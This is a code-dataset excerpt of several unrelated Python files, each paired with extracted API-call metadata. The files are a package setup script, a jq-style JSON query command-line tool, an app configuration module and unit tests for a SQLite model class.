] | [((520, 553), 'numpy.random.RandomState', 'np.random.RandomState', (['(1234567890)'], {}), '(1234567890)\n', (541, 553), True, 'import numpy as np\n'), ((560, 612), 'pandas.DataFrame', 'pd.DataFrame', (["{'x': [1, 2, 1, 2], 'y': [1, 1, 2, 2]}"], {}), "({'x': [1, 2, 1, 2], 'y': [1, 1, 2, 2]})\n", (572, 612), True, 'import pandas as pd\n'), ((977, 1015), 'plotnine.theme', 'theme', ([], {'subplots_adjust': "{'right': 0.85}"}), "(subplots_adjust={'right': 0.85})\n", (982, 1015), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((1047, 1099), 'pandas.DataFrame', 'pd.DataFrame', (["{'x': [1, 2, 1, 2], 'y': [1, 1, 2, 2]}"], {}), "({'x': [1, 2, 1, 2], 'y': [1, 1, 2, 2]})\n", (1059, 1099), True, 'import pandas as pd\n'), ((2675, 2733), 'pandas.DataFrame', 'pd.DataFrame', (["{'x': ['a', 'b', 'b'], 'y': ['a', 'a', 'b']}"], {}), "({'x': ['a', 'b', 'b'], 'y': ['a', 'a', 'b']})\n", (2687, 2733), True, 'import pandas as pd\n'), ((2964, 3032), 'pandas.DataFrame', 'pd.DataFrame', (["{'x': ['a', 'b', 'b', 'b'], 'y': ['a', 'a', 'b', 'b']}"], {}), "({'x': ['a', 'b', 'b', 'b'], 'y': ['a', 'a', 'b', 'b']})\n", (2976, 3032), True, 'import pandas as pd\n'), ((3066, 3110), 'plotnine.position_dodge', 'position_dodge', ([], {'preserve': '"""single"""', 'width': '(0.9)'}), "(preserve='single', width=0.9)\n", (3080, 3110), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((4035, 4082), 'plotnine.position_jitterdodge', 'position_jitterdodge', ([], {'random_state': 'random_state'}), '(random_state=random_state)\n', (4055, 4082), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((4314, 4343), 'plotnine.geom_point', 'geom_point', ([], {'position': '"""jitter"""'}), "(position='jitter')\n", (4324, 4343), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((4421, 4459), 'plotnine.geom_point', 'geom_point', ([], {'position': '"""position_jitter"""'}), "(position='position_jitter')\n", (4431, 4459), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((4653, 4689), 'plotnine.geom_point', 'geom_point', ([], {'position': 'position_jitter'}), '(position=position_jitter)\n', (4663, 4689), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((4801, 4833), 'pandas.DataFrame', 'pd.DataFrame', (["{'x': [], 'y': []}"], {}), "({'x': [], 'y': []})\n", (4813, 4833), True, 'import pandas as pd\n'), ((1274, 1363), 'plotnine.geom_jitter', 'geom_jitter', ([], {'size': '(10)', 'color': '"""blue"""', 'width': '(0.1)', 'height': '(0.1)', 'random_state': 'random_state'}), "(size=10, color='blue', width=0.1, height=0.1, random_state=\n random_state)\n", (1285, 1363), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((1425, 1453), 'pytest.raises', 'pytest.raises', (['PlotnineError'], {}), '(PlotnineError)\n', (1438, 1453), False, 'import pytest\n'), ((3496, 3535), 'plotnine.geom_boxplot', 'geom_boxplot', ([], {'position': '"""dodge2"""', 'size': '(2)'}), "(position='dodge2', size=2)\n", (3508, 3535), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((4191, 4229), 'plotnine.geom_point', 'geom_point', ([], {'size': '(10)', 'position': 'position'}), '(size=10, position=position)\n', (4201, 4229), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((4366, 4390), 'plotnine.positions.position.position.from_geom', 'position.from_geom', (['geom'], {}), '(geom)\n', (4384, 4390), False, 'from plotnine.positions.position import position\n'), ((4482, 4506), 'plotnine.positions.position.position.from_geom', 'position.from_geom', (['geom'], {}), '(geom)\n', (4500, 4506), False, 'from plotnine.positions.position import position\n'), ((4598, 4622), 'plotnine.positions.position.position.from_geom', 'position.from_geom', (['geom'], {}), '(geom)\n', (4616, 4622), False, 'from plotnine.positions.position import position\n'), ((4712, 4736), 'plotnine.positions.position.position.from_geom', 'position.from_geom', (['geom'], {}), '(geom)\n', (4730, 4736), False, 'from plotnine.positions.position import position\n'), ((1202, 1262), 'plotnine.geom_jitter', 'geom_jitter', ([], {'size': '(10)', 'color': '"""red"""', 'random_state': 'random_state'}), "(size=10, color='red', random_state=random_state)\n", (1213, 1262), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((1581, 1600), 'plotnine.geom_point', 'geom_point', ([], {'size': '(10)'}), '(size=10)\n', (1591, 1600), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((1775, 1791), 'plotnine.aes', 'aes', (['"""factor(z)"""'], {}), "('factor(z)')\n", (1778, 1791), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((1813, 1834), 'plotnine.aes', 'aes', ([], {'fill': '"""factor(x)"""'}), "(fill='factor(x)')\n", (1816, 1834), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((2048, 2058), 'plotnine.ggplot', 'ggplot', (['df'], {}), '(df)\n', (2054, 2058), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((2179, 2211), 'plotnine.aes', 'aes', (['"""factor(x)"""', '"""y"""'], {'label': '"""y"""'}), "('factor(x)', 'y', label='y')\n", (2182, 2211), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((2364, 2380), 'plotnine.aes', 'aes', (['"""factor(z)"""'], {}), "('factor(z)')\n", (2367, 2380), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((2402, 2423), 'plotnine.aes', 'aes', ([], {'fill': '"""factor(x)"""'}), "(fill='factor(x)')\n", (2405, 2423), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((2516, 2532), 'plotnine.aes', 'aes', (['"""factor(z)"""'], {}), "('factor(z)')\n", (2519, 2532), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((2554, 2575), 'plotnine.aes', 'aes', ([], {'fill': '"""factor(x)"""'}), "(fill='factor(x)')\n", (2557, 2575), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((2779, 2797), 'plotnine.aes', 'aes', (['"""x"""'], {'fill': '"""y"""'}), "('x', fill='y')\n", (2782, 2797), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((3163, 3183), 'plotnine.geom_bar', 'geom_bar', ([], {'position': 'd'}), '(position=d)\n', (3171, 3183), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((3459, 3483), 'plotnine.aes', 'aes', (['"""x"""', '"""y"""'], {'color': '"""c"""'}), "('x', 'y', color='c')\n", (3462, 3483), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((3622, 3646), 'plotnine.aes', 'aes', (['"""x"""', '"""y"""'], {'color': '"""c"""'}), "('x', 'y', color='c')\n", (3625, 3646), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((3897, 3911), 'numpy.ones', 'np.ones', (['(n * 2)'], {}), '(n * 2)\n', (3904, 3911), True, 'import numpy as np\n'), ((4146, 4179), 'plotnine.geom_point', 'geom_point', ([], {'size': '(10)', 'fill': '"""black"""'}), "(size=10, fill='black')\n", (4156, 4179), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((4557, 4574), 'plotnine.position_jitter', 'position_jitter', ([], {}), '()\n', (4572, 4574), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((4881, 4893), 'plotnine.geom_point', 'geom_point', ([], {}), '()\n', (4891, 4893), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((4952, 4999), 'plotnine.aes', 'aes', ([], {'xmin': '"""x"""', 'xmax': '"""x+1"""', 'ymin': '"""y"""', 'ymax': '"""y+1"""'}), "(xmin='x', xmax='x+1', ymin='y', ymax='y+1')\n", (4955, 4999), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((1171, 1190), 'plotnine.geom_point', 'geom_point', ([], {'size': '(10)'}), '(size=10)\n', (1181, 1190), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((1484, 1501), 'plotnine.position_jitter', 'position_jitter', ([], {}), '()\n', (1499, 1501), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((1555, 1568), 'plotnine.aes', 'aes', (['"""x"""', '"""y"""'], {}), "('x', 'y')\n", (1558, 1568), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((1674, 1700), 'plotnine.position_nudge', 'position_nudge', (['(0.25)', '(0.25)'], {}), '(0.25, 0.25)\n', (1688, 1700), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((2079, 2118), 'plotnine.aes', 'aes', (['"""factor(x)"""', '"""y"""'], {'fill': '"""factor(y)"""'}), "('factor(x)', 'y', fill='factor(y)')\n", (2082, 2118), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((2243, 2268), 'plotnine.position_stack', 'position_stack', ([], {'vjust': '(0.5)'}), '(vjust=0.5)\n', (2257, 2268), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((2828, 2861), 'plotnine.position_dodge', 'position_dodge', ([], {'preserve': '"""single"""'}), "(preserve='single')\n", (2842, 2861), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((3132, 3150), 'plotnine.aes', 'aes', (['"""x"""'], {'fill': '"""y"""'}), "('x', fill='y')\n", (3135, 3150), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((3695, 3729), 'plotnine.position_dodge2', 'position_dodge2', ([], {'preserve': '"""single"""'}), "(preserve='single')\n", (3710, 3729), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((3934, 3946), 'numpy.arange', 'np.arange', (['n'], {}), '(n)\n', (3943, 3946), True, 'import numpy as np\n'), ((4104, 4133), 'plotnine.aes', 'aes', (['"""x"""', '"""y"""'], {'fill': '"""letters"""'}), "('x', 'y', fill='letters')\n", (4107, 4133), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((4855, 4868), 'plotnine.aes', 'aes', (['"""x"""', '"""y"""'], {}), "('x', 'y')\n", (4858, 4868), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((1145, 1158), 'plotnine.aes', 'aes', (['"""x"""', '"""y"""'], {}), "('x', 'y')\n", (1148, 1158), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((3225, 3244), 'plotnine.after_stat', 'after_stat', (['"""count"""'], {}), "('count')\n", (3235, 3244), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n'), ((3252, 3271), 'plotnine.after_stat', 'after_stat', (['"""count"""'], {}), "('count')\n", (3262, 3271), False, 'from plotnine import ggplot, aes, geom_point, geom_jitter, geom_bar, geom_col, geom_boxplot, geom_text, geom_rect, after_stat, position_dodge, position_dodge2, position_jitter, position_jitterdodge, position_nudge, position_stack, theme\n')] |
from setuptools import setup, find_packages
NAME = 'golr-schema-generator'
DESCRIPTION = 'GOlr Schema Generator'
URL = 'https://github.com/deepakunni3/golr-schema-generator'
AUTHOR = '<NAME>'
EMAIL = '<EMAIL>'
REQUIRES_PYTHON = '>=3.7.0'
VERSION = '0.0.1'
LICENSE = 'BSD3'
REQUIRED = [
'PyYAML>=5.3'
]
EXTRAS = {
'test': ['pytest']
}
setup(
name=NAME,
version=VERSION,
author=AUTHOR,
author_email=EMAIL,
python_requires=REQUIRES_PYTHON,
url=URL,
description=DESCRIPTION,
long_description=open('README.md').read(),
license=LICENSE,
packages=find_packages(),
keywords='Solr GOlr golr-schema',
classifiers=[
'License :: OSI Approved :: BSD License',
'Programming Language :: Python :: 3'
],
install_requires=REQUIRED,
extras_require=EXTRAS,
include_package_data=True
) | [
"setuptools.find_packages"
] | [((593, 608), 'setuptools.find_packages', 'find_packages', ([], {}), '()\n', (606, 608), False, 'from setuptools import setup, find_packages\n')] |
import json
import click
from tokenizer import get_grouped_tokens, TokenName
NULL = "null"
#from click documentation to support alias command
class AliasedGroup(click.Group):
def get_command(self, ctx, cmd_name):
rv = click.Group.get_command(self, ctx, cmd_name)
if rv is not None:
return rv
matches = [x for x in self.list_commands(ctx)
if x.startswith(cmd_name)]
if not matches:
return None
elif len(matches) == 1:
return click.Group.get_command(self, ctx, matches[0])
ctx.fail('Too many matches: %s' % ', '.join(sorted(matches)))
@click.command()
@click.option("--expression", "-e", type=click.STRING, help="jq style expression to search in the json", required=True)
@click.option("--file", "-f", type=click.File("r"), help="File with valid json content", required=True)
def cli(expression, file):
all_tokens = [g for g in get_grouped_tokens(expression)]
validate_tokens(all_tokens, expression)
json_obj = get_json(file)
result = jq_parser(json_obj, all_tokens)
result = json.dumps(result, indent=4)
click.echo(result)
def jq_parser(json_obj, tokens):
if not (json_obj and json_obj != NULL and tokens):
return json_obj
if(len(tokens) == 1):
token = tokens[0]
return retrieve_token_from_json(json_obj, token)
first_token = tokens[0]
remaining_tokens = tokens[1:]
if isinstance(json_obj, list):
result = []
for obj in json_obj:
r = retrieve_token_from_json(obj, first_token)
if r and r != NULL:
result.append(jq_parser(r, remaining_tokens))
else:
result.append(NULL)
index = _get_index(first_token)
if index is None:
return result
if index >= len(result):
raise click.ClickException(f"Bad index {index}. There are only {len(result)} elements in the array")
return result[index]
elif isinstance(json_obj, dict):
r = retrieve_token_from_json(json_obj, first_token)
return jq_parser(r, remaining_tokens)
def retrieve_token_from_json(json_obj, token):
if not (json_obj and json_obj != NULL and token):
return json_obj
index = _get_index(token)
if isinstance(json_obj, list):
result = []
for obj in json_obj:
#this is probably the only case for a valid json
if isinstance(obj, dict):
#case insensitive
obj = {k.strip().lower() : v for k,v in obj.items()}
result.append(obj.get(token[0].value.strip().lower(), NULL))
if index is None:
return result
if index >= len(result):
raise click.ClickException(f"Bad index {index}. There are only {len(result)} elements in the array")
return result[index]
elif isinstance(json_obj, dict):
#case insensitive
json_obj = {k.strip().lower() : v for k,v in json_obj.items()}
val = json_obj.get(token[0].value.strip().lower(), NULL)
if isinstance(val, list):
if index is None:
return val
if index >= len(val):
raise click.ClickException(f"Bad index {index}. There are only {len(val)} elements in the array")
return val[index]
return val
def get_json(fp):
try:
return json.load(fp)
except Exception as ex:
raise click.ClickException(str(ex))
def validate_tokens(all_tokens, expression):
if not all_tokens or len(all_tokens) == 0:
raise click.ClickException(f"{expression} is a bad expression")
for g in all_tokens:
if not g:
raise click.ClickException(f"{expression} is a bad expression. Currently not supporting unix style multiple dots (such as .. etc)")
if len(g) == 1:
if not ( g[0].name == TokenName.KEY ):
message = str(g[0])
raise click.ClickException(f"{message} is a bad token. Currently supports either plain key or key with one index (in case of array)")
elif len(g) == 2:
if not ( g[0].name == TokenName.KEY and g[1].name == TokenName.INDEX):
message = str(g[0]) + ", " + str(g[1])
raise click.ClickException(f"{message} is a bad token. Currently supports either plain key or key with one index (in case of array)")
elif len(g) > 2:
message = ", ".join([str(r) for r in g])
raise click.ClickException(f"{message} is a bad token. Currently supports either plain key or key with one index (in case of array)")
def _get_index(token):
if not token or len(token) <= 1:
return None
t = token[1]
if t.name == TokenName.INDEX:
if t.value.strip().isdecimal():
return int(t.value.strip())
else:
raise click.ClickException(f"{t.value} is a bad value where a numeric index of >= 0 is expected")
return None | [
"click.Group.get_command",
"json.load",
"click.option",
"click.echo",
"json.dumps",
"click.command",
"click.File",
"click.ClickException",
"tokenizer.get_grouped_tokens"
] | [((645, 660), 'click.command', 'click.command', ([], {}), '()\n', (658, 660), False, 'import click\n'), ((662, 785), 'click.option', 'click.option', (['"""--expression"""', '"""-e"""'], {'type': 'click.STRING', 'help': '"""jq style expression to search in the json"""', 'required': '(True)'}), "('--expression', '-e', type=click.STRING, help=\n 'jq style expression to search in the json', required=True)\n", (674, 785), False, 'import click\n'), ((1105, 1133), 'json.dumps', 'json.dumps', (['result'], {'indent': '(4)'}), '(result, indent=4)\n', (1115, 1133), False, 'import json\n'), ((1138, 1156), 'click.echo', 'click.echo', (['result'], {}), '(result)\n', (1148, 1156), False, 'import click\n'), ((233, 277), 'click.Group.get_command', 'click.Group.get_command', (['self', 'ctx', 'cmd_name'], {}), '(self, ctx, cmd_name)\n', (256, 277), False, 'import click\n'), ((816, 831), 'click.File', 'click.File', (['"""r"""'], {}), "('r')\n", (826, 831), False, 'import click\n'), ((3429, 3442), 'json.load', 'json.load', (['fp'], {}), '(fp)\n', (3438, 3442), False, 'import json\n'), ((3622, 3679), 'click.ClickException', 'click.ClickException', (['f"""{expression} is a bad expression"""'], {}), "(f'{expression} is a bad expression')\n", (3642, 3679), False, 'import click\n'), ((941, 971), 'tokenizer.get_grouped_tokens', 'get_grouped_tokens', (['expression'], {}), '(expression)\n', (959, 971), False, 'from tokenizer import get_grouped_tokens, TokenName\n'), ((3741, 3876), 'click.ClickException', 'click.ClickException', (['f"""{expression} is a bad expression. Currently not supporting unix style multiple dots (such as .. etc)"""'], {}), "(\n f'{expression} is a bad expression. Currently not supporting unix style multiple dots (such as .. etc)'\n )\n", (3761, 3876), False, 'import click\n'), ((4910, 5006), 'click.ClickException', 'click.ClickException', (['f"""{t.value} is a bad value where a numeric index of >= 0 is expected"""'], {}), "(\n f'{t.value} is a bad value where a numeric index of >= 0 is expected')\n", (4930, 5006), False, 'import click\n'), ((526, 572), 'click.Group.get_command', 'click.Group.get_command', (['self', 'ctx', 'matches[0]'], {}), '(self, ctx, matches[0])\n', (549, 572), False, 'import click\n'), ((4000, 4137), 'click.ClickException', 'click.ClickException', (['f"""{message} is a bad token. Currently supports either plain key or key with one index (in case of array)"""'], {}), "(\n f'{message} is a bad token. Currently supports either plain key or key with one index (in case of array)'\n )\n", (4020, 4137), False, 'import click\n'), ((4314, 4451), 'click.ClickException', 'click.ClickException', (['f"""{message} is a bad token. Currently supports either plain key or key with one index (in case of array)"""'], {}), "(\n f'{message} is a bad token. Currently supports either plain key or key with one index (in case of array)'\n )\n", (4334, 4451), False, 'import click\n'), ((4538, 4675), 'click.ClickException', 'click.ClickException', (['f"""{message} is a bad token. Currently supports either plain key or key with one index (in case of array)"""'], {}), "(\n f'{message} is a bad token. Currently supports either plain key or key with one index (in case of array)'\n )\n", (4558, 4675), False, 'import click\n')] |
import os
BASE_DIR = os.path.abspath(os.path.dirname(__file__))
MAIN_DB_URL = os.path.join(BASE_DIR, 'bucketlist.sqlite')
TEST_DB_URL = os.path.join(BASE_DIR, 'test.sqlite')
class BaseConfig(object):
'''
The class holds base config for each environment
'''
SECRET_KEY = os.getenv('SECRET_KEY', 'This should be changed')
SQLALCHEMY_DATABASE_URI = os.getenv(
'DATABASE_URI', "'sqlite:///' + {}".format(MAIN_DB_URL))
SQLALCHEMY_TRACK_MODIFICATIONS = False
ERROR_404_HELP = False
DEBUG = False
TESTING = False
class DevelopmentConfig(BaseConfig):
'''
configuration for the development environment
'''
SQLALCHEMY_DATABASE_URI = 'sqlite:///' + MAIN_DB_URL
DEBUG = True
DEVELOPMENT = True
class TestingConfig(BaseConfig):
'''
config when testing
'''
TESTING = True
SQLALCHEMY_DATABASE_URI = 'sqlite:///' + TEST_DB_URL
CSRF_ENABLED = False
class StagingConfig(BaseConfig):
DEVELOPMENT = True
DEBUG = True
class ProductionConfig(BaseConfig):
'''
config for when in production
'''
DEBUG = False
| [
"os.path.dirname",
"os.path.join",
"os.getenv"
] | [((79, 122), 'os.path.join', 'os.path.join', (['BASE_DIR', '"""bucketlist.sqlite"""'], {}), "(BASE_DIR, 'bucketlist.sqlite')\n", (91, 122), False, 'import os\n'), ((137, 174), 'os.path.join', 'os.path.join', (['BASE_DIR', '"""test.sqlite"""'], {}), "(BASE_DIR, 'test.sqlite')\n", (149, 174), False, 'import os\n'), ((38, 63), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (53, 63), False, 'import os\n'), ((289, 338), 'os.getenv', 'os.getenv', (['"""SECRET_KEY"""', '"""This should be changed"""'], {}), "('SECRET_KEY', 'This should be changed')\n", (298, 338), False, 'import os\n')] |
import datetime
import os
from typing import List, Optional
import unittest
from parentopticon.db import test_utilities
from parentopticon.db.model import ColumnInteger, ColumnText, Model
class ModelTests(test_utilities.DBTestCase):
"Test all of our logic around the model class."
class MyTable(Model):
COLUMNS = {
"id": ColumnInteger(autoincrement=True, primary_key=True),
"count": ColumnInteger(),
"name": ColumnText(null=True),
}
def _makerows(self, names: Optional[List[str]] = None):
"Make a few rows. Useful for many tests."
names = names or ["foo", "bar", "baz"]
return {
ModelTests.MyTable.insert(self.db, count=(i+1)*2, name=name)
for i, name in enumerate(names)
}
def setUp(self):
super().setUp()
self.db.execute_commit_return(ModelTests.MyTable.create_statement())
self.db.execute_commit_return(ModelTests.MyTable.truncate_statement())
def test_create_statement(self):
"Can we get a proper create table clause?"
result = ModelTests.MyTable.create_statement()
expected = "\n".join((
"CREATE TABLE IF NOT EXISTS MyTable (",
"count INTEGER,",
"id INTEGER PRIMARY KEY AUTOINCREMENT,",
"name TEXT",
");",
))
self.assertEqual(result, expected)
def test_insert(self):
"Can we insert a row into a table?"
rowid = ModelTests.MyTable.insert(self.db, count=3, name="foobar")
found = self.db.execute("SELECT count, name FROM MyTable").fetchall()
self.assertEqual(len(found), 1)
def test_get(self):
"Can we get a row from the table?"
rowid = ModelTests.MyTable.insert(self.db, count=3, name="foobar")
result = ModelTests.MyTable.get(self.db, rowid)
self.assertEqual(result.id, rowid)
self.assertEqual(result.count, 3)
self.assertEqual(result.name, "foobar")
def test_get_none(self):
"Can we get None when the row does not exist?"
result = ModelTests.MyTable.get(self.db, -1)
self.assertIs(result, None)
def test_list_all(self):
"Can we get several rows from the table?"
rowids = self._makerows()
results = ModelTests.MyTable.list(self.db)
self.assertEqual({result.id for result in results}, rowids)
def test_list_some(self):
"Can we get several rows from the table with a where clause?"
rowids = self._makerows()
results = ModelTests.MyTable.list_where(self.db, where="count >= 4")
self.assertEqual({result.count for result in results}, {4, 6})
def test_list_with_none(self):
"Can we get a list where an item is NULL?"
rowids = self._makerows(names=["foo", None, "bar"])
results = ModelTests.MyTable.list(self.db, name=None)
self.assertEqual({result.count for result in results}, {4})
def test_search_not_found(self):
"Can we search and not find something?"
results = ModelTests.MyTable.search(self.db, name="sir-not-appearing")
self.assertIs(results, None)
def test_search_one(self):
"Can we search and find a single row?"
rowids = self._makerows()
results = ModelTests.MyTable.search(self.db, name="foo")
self.assertEqual(results.name, "foo")
self.assertEqual(results.count, 2)
def test_search_many(self):
"Do we error when we have multiple matches?"
self._makerows(names=["foo", "foo", "bar"])
with self.assertRaises(ValueError):
ModelTests.MyTable.search(self.db, name="foo")
def test_search_with_none(self):
"Do we properly search for NULL columns?"
self._makerows(names=["foo", None, "bar"])
results = ModelTests.MyTable.search(self.db, name=None)
self.assertEqual(results.name, None)
self.assertEqual(results.count, 4)
def test_update(self):
"Can we update a row with update()?"
rows = self._makerows(names=["foo"])
row_id = list(rows)[0]
ModelTests.MyTable.update(self.db, row_id, name="biff")
results = ModelTests.MyTable.get(self.db, row_id)
self.assertEqual(results.name, "biff")
def test_update_multiple(self):
"Can we update a row with multiple values?"
rows = self._makerows(names=["foo"])
row_id = list(rows)[0]
ModelTests.MyTable.update(self.db, row_id, name="biff", count=100)
results = ModelTests.MyTable.get(self.db, row_id)
self.assertEqual(results.count, 100)
self.assertEqual(results.name, "biff")
| [
"parentopticon.db.model.ColumnText",
"parentopticon.db.model.ColumnInteger"
